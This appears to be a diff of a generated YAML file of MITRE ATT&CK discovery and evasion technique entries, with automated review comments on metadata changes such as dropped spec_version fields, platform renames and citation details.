- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50182,19 +50831,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
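Review bot: `x_mitre_permissions_required` with its `User` value is removed from T1087.004 in the earlier hunk and not reinstated anywhere in this block, while every other removed key (contributors, platforms, references, ids) comes back in a new position; if ATT&CK has retired that field the drop is expected, otherwise it is lost data and should be checked. The upstream typo in the `Google Cloud - IAM Servie Accounts List API` source_name is preserved, which is correct here: whatever citation key the description uses must match that string exactly, so it should only ever be fixed upstream. Platforms change the same way as for T1087 above, so the same consumer check applies.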
@@ -50265,46 +50956,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -50328,6 +50984,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -50338,9 +50997,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50350,12 +51014,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
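Review bot: the new "Deloitte Environment Awareness" reference points at a Google Drive share link (https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit), which its owner can make private or delete at any time and which carries no version, so the "Retrieved September 13, 2024" date is the only thing a reader will be able to verify later. It comes straight from the upstream ATT&CK object, so there is nothing to change in this repo, but it is worth reporting upstream as a non-durable citation. Note also that the retrieval date is one day after this object's new modified timestamp (2024-09-12T15:50:18.050Z), which is harmless but confirms the reference metadata was not generated from the same snapshot.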
@@ -50398,12 +51089,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
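Review bot: `spec_version: '2.1'` is removed from T1069.001 here (and the same removal repeats on every technique object below) while x_mitre_attack_spec_version stays at 3.1.0; spec_version is a required property on STIX 2.1 objects, so its disappearance means the generator is now reading a STIX 2.0 source bundle or stripping the key, and anything that validates these objects as STIX 2.1 will reject them. Confirm the source change is intended and say so in the commit message. Separately, the modified timestamp moves backwards, from '2023-05-09T14:00:00.188Z' to '2023-04-07T17:14:42.184Z'; the old value with its round 14:00:00.188Z time looks like a generator placeholder rather than the upstream value, so the regression is a correction, but the same pattern repeats on other objects in this file (T1614.001, T1012, T1622) and deserves a sentence explaining it.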
@@ -50414,28 +51104,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -50468,9 +51161,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -50513,7 +51205,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -50552,13 +51244,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50599,87 +51289,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
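Review bot: `x_mitre_permissions_required: - User` is dropped from T1614 (the `-` lines near the end of this hunk) while the preceding hunk for its sub-technique T1614.001 keeps the same field as unchanged context; if the field is being retired it should go from both, and if the upstream T1614 object simply no longer carries it, then the sub-technique only retains it because its own modified date went back to 2021 and it was never re-serialized. State which it is, because a consumer keying on permissions_required will now see the parent and child disagree. Two smaller points: the FBI Ragnar Locker URL moves from assets.documentcloud.org to s3.documentcloud.org with a new retrieval date, which is fine, and the "Securelist Trasparent Tribe 2020" source_name keeps its upstream misspelling, which must not be corrected locally or the `(Citation: Securelist Trasparent Tribe 2020)` marker in the description would stop resolving.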
@@ -50732,17 +51420,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
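Review bot: the description now says "Microsoft Graph API" but the inline marker right after it is still `(Citation: Azure AD Graph API)`; the marker only has to match a source_name in external_references, so nothing is broken, but a reader following it will land on documentation for the retired Azure AD Graph rather than Microsoft Graph. The external_references entry for that source_name sits outside this hunk, so check whether upstream updated its URL as well; if not, this is an upstream issue to report rather than patch here. The "Azure AD" to "Entra ID" rename in the same line is consistent with the platform rename further down in this object.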
@@ -50750,10 +51437,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
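Review bot: x_mitre_attack_spec_version is now emitted between kill_chain_phases and x_mitre_contributors for T1526, whereas T1614 above and T1583.007 below still emit it after object_marking_refs; the keys here look alphabetically sorted and insertion-ordered elsewhere, which points at two serialization paths in the generator. Harmless for YAML consumers, but it makes every future diff of this file noisier than it needs to be, so consider sorting keys the same way for every object. The added contributor (Arun Seelagan, CISA) lines up with the version bump to 1.4 in the next hunk.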
@@ -50762,15 +51451,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
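Review bot: the platform list for T1526 changes from "Azure AD, Office 365, SaaS, IaaS, Google Workspace" to "SaaS, IaaS, Office Suite, Identity Provider", and a new data source "Logon Session: Logon Session Creation" is added; both are expected alongside the bump to x_mitre_version 1.4. The practical consequence is that any filter or index built on the old platform strings ("Azure AD", "Office 365", "Google Workspace") will no longer match this object, so every platform-keyed artifact generated from this file needs to be regenerated in the same change, not just the technique entries.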
@@ -50798,9 +51488,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -50875,7 +51562,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -50947,7 +51633,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -50996,12 +51681,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51022,12 +51706,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51052,7 +51735,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -51107,7 +51789,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
